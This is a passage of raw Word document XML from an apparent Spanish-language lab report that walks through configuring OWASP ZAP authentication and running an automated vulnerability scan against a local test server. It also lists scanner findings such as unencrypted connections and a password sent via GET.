        <w:t xml:space="preserve">Password field submitted using GET method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">en: </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidRPr="00711AF7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA8F6B8" w14:textId="6386042E" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0428EA" wp14:editId="4FCC1672">
            <wp:extent cx="5400040" cy="561340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5613400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="275B40B7" w14:textId="77777777" w:rsidR="00711AF7" w:rsidRPr="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DBADD4" w14:textId="6778CE2F" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711AF7">
        <w:t>Unencrypted connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en: </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidRPr="00711AF7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711AF7">
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208ADF2E" w14:textId="11B30303" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DF31F09" wp14:editId="1BBCFD81">
            <wp:extent cx="5400040" cy="562165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5621655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8741EA" w14:textId="51B7E331" w:rsidR="000472A2" w:rsidRDefault="000472A2" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1693B47B" w14:textId="3CD5C59B" w:rsidR="000472A2" w:rsidRDefault="000472A2" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Por último, vamos ver la estructura del sitio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700AAE83" w14:textId="64D5C44F" w:rsidR="000472A2" w:rsidRDefault="000472A2" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D8FA1D" w14:textId="49D1A8DD" w:rsidR="000472A2" w:rsidRPr="00711AF7" w:rsidRDefault="000472A2" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000472A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B4802C0" wp14:editId="4A26BABD">
            <wp:extent cx="5400040" cy="5591810"/>
            <wp:effectExtent l="0" t="0" r="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5591810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D817B7A" w14:textId="20A88A37" w:rsidR="00711AF7" w:rsidRPr="000472A2" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC42662" w14:textId="77777777" w:rsidR="00B172D0" w:rsidRPr="000472A2" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08642FAD" w14:textId="3BE8CC22" w:rsidR="00E47C24" w:rsidRPr="00711AF7" w:rsidRDefault="000472A2">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc128034155"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="63773F3B" w14:textId="35735339" w:rsidR="004601B3" w:rsidRDefault="004601B3" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244C8D31" w14:textId="49D09319" w:rsidR="00610328" w:rsidRDefault="00610328" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00610328">
        <w:t xml:space="preserve">Primero </w:t>
      </w:r>
      <w:r>
        <w:t>voy</w:t>
      </w:r>
      <w:r w:rsidRPr="00610328">
        <w:t xml:space="preserve"> configurar la a</w:t>
      </w:r>
      <w:r>
        <w:t>utentificación manual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DEC357" w14:textId="61A801B8" w:rsidR="00610328" w:rsidRDefault="00610328" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00610328">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123BB297" wp14:editId="40A59CEB">
            <wp:extent cx="5400040" cy="4603750"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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4603750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556CF4E" w14:textId="4DD3783E" w:rsidR="00610328" w:rsidRDefault="00610328" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B8CA00" w14:textId="13518444" w:rsidR="00610328" w:rsidRDefault="00610328" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora abriré el navegador y escribiré la ULR: </w:t>
      </w:r>
      <w:hyperlink r:id="rId138" w:history="1">
        <w:r w:rsidR="004A754B" w:rsidRPr="003267AB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48C57A6E" w14:textId="41509EE5" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEC9886" w14:textId="118A25CE" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004A754B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C2423BC" wp14:editId="6868A4E0">
            <wp:extent cx="5400040" cy="452437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4524375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9100C" w14:textId="05A437BE" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FB343E" w14:textId="3EEB7C2B" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora inicio sesión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B075270" w14:textId="12F28435" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC69FEB" w14:textId="2E4EF1F7" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004A754B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48AFB7C6" wp14:editId="79402EC3">
            <wp:extent cx="5400040" cy="226822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268220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A565C7" w14:textId="0D4B3648" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196E1C29" w14:textId="27ECCBC0" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004A754B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E53F38" wp14:editId="5A6D2337">
            <wp:extent cx="5400040" cy="2435225"/>
            <wp:effectExtent l="0" t="0" r="0" b="31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435225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42514543" w14:textId="07D4EE42" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC5146D" w14:textId="7A014D4C" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora busco la sesión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF5924" w14:textId="450B8FB9" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67957748" w14:textId="5225B16F" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004A754B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0156E824" wp14:editId="279F35AB">
            <wp:extent cx="5400040" cy="4357370"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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4357370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B14CBDD" w14:textId="221AB946" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76427184" w14:textId="0EC59105" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso no se genera una sesión por lo tanto este método no vale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5923D0" w14:textId="12BFC8D8" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6288B79F" w14:textId="10CB0DE8" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Entonces creo una sesión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E13135" w14:textId="5229935F" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20078A8A" w14:textId="14AD8B26" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004A754B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="527233B4" wp14:editId="67FDF504">
            <wp:extent cx="5400040" cy="4188460"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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4188460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BFEB79" w14:textId="3B2768E7" w:rsidR="004A754B" w:rsidRDefault="004A754B" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F042AD" w14:textId="369BFEDD" w:rsidR="004A754B" w:rsidRDefault="007E38C3" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Añado el usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198D3450" w14:textId="4AE1D3F1" w:rsidR="007E38C3" w:rsidRDefault="007E38C3" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="007E38C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D439A29" wp14:editId="6E0EDA83">
            <wp:extent cx="5400040" cy="4376420"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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4376420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="548CA43C" w14:textId="1E5D791F" w:rsidR="007E38C3" w:rsidRDefault="007E38C3" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FC6A4A" w14:textId="3C1F48C4" w:rsidR="007E38C3" w:rsidRDefault="007E38C3" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Habilito el Force User Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173758CE" w14:textId="415682E5" w:rsidR="007E38C3" w:rsidRDefault="007E38C3" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE85D8A" w14:textId="70D114BB" w:rsidR="007E38C3" w:rsidRDefault="00E172EC" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E172EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E5156FB" wp14:editId="62025CCB">
            <wp:extent cx="5400040" cy="298005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980055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20153023" w14:textId="33EE453A" w:rsidR="00C948D9" w:rsidRDefault="00C948D9" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora configuro cual es la página de login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E290F8" w14:textId="36BF3009" w:rsidR="00C948D9" w:rsidRDefault="00C948D9" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C948D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FA2A581" wp14:editId="0959883D">
            <wp:extent cx="5400040" cy="2529205"/>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529205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B980D4C" w14:textId="43431159" w:rsidR="00E172EC" w:rsidRDefault="00E172EC" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFD5D2B" w14:textId="4277737D" w:rsidR="00E172EC" w:rsidRDefault="00E172EC" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora en escaneo automatizado, elijo la URL y ejecuto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B966157" w14:textId="33072548" w:rsidR="00E172EC" w:rsidRDefault="00E172EC" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E172EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50910A19" wp14:editId="21287E3B">
            <wp:extent cx="5400040" cy="36417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641725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="342E0290" w14:textId="64252C1F" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011A8AFD" w14:textId="43305243" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Escaneo acabado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0ADE1" w14:textId="73AB6CE6" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127D9D6E" w14:textId="0C98F77C" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F912A86" wp14:editId="25641C28">
            <wp:extent cx="5400040" cy="243967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439670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B186D" w14:textId="5917D11F" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BE6AD5" w14:textId="7182879C" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora voy a generar un informe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790664E5" w14:textId="7F09699E" w:rsidR="00E172EC" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17EB1C00" wp14:editId="2C16BACF">
            <wp:extent cx="5400040" cy="2318385"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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318385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725CB1C" w14:textId="6FEDBC9F" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6A1C98" w14:textId="77777777" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D246A8D" w14:textId="17D7BE60" w:rsidR="00E172EC" w:rsidRDefault="00E172EC" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAF2378" w14:textId="088AEB01" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72637DEF" wp14:editId="50091C2E">
            <wp:extent cx="5400040" cy="439039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4390390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5466341E" w14:textId="3577F6B9" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5640D4DF" w14:textId="31D8EBF4" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE93EAB" wp14:editId="07ED3362">
            <wp:extent cx="5400040" cy="480314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4803140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E0AFB4" w14:textId="0EAAC221" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E631E5" w14:textId="5E8CA6F7" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="648A5C8B" wp14:editId="48F44876">
            <wp:extent cx="5400040" cy="482409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4824095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE323D" w14:textId="03787EBD" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A2C5D8" w14:textId="49BB5BE6" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso encuentra 2 vulnerabilidades que el considera de nivel alto y cuatro de nivel medio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D9CCE" w14:textId="20956C8B" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F71CC4B" w14:textId="3A88BB49" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060934C5" wp14:editId="4A9468E3">
            <wp:extent cx="5400040" cy="33401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340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A85ABCC" w14:textId="5E646EB3" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
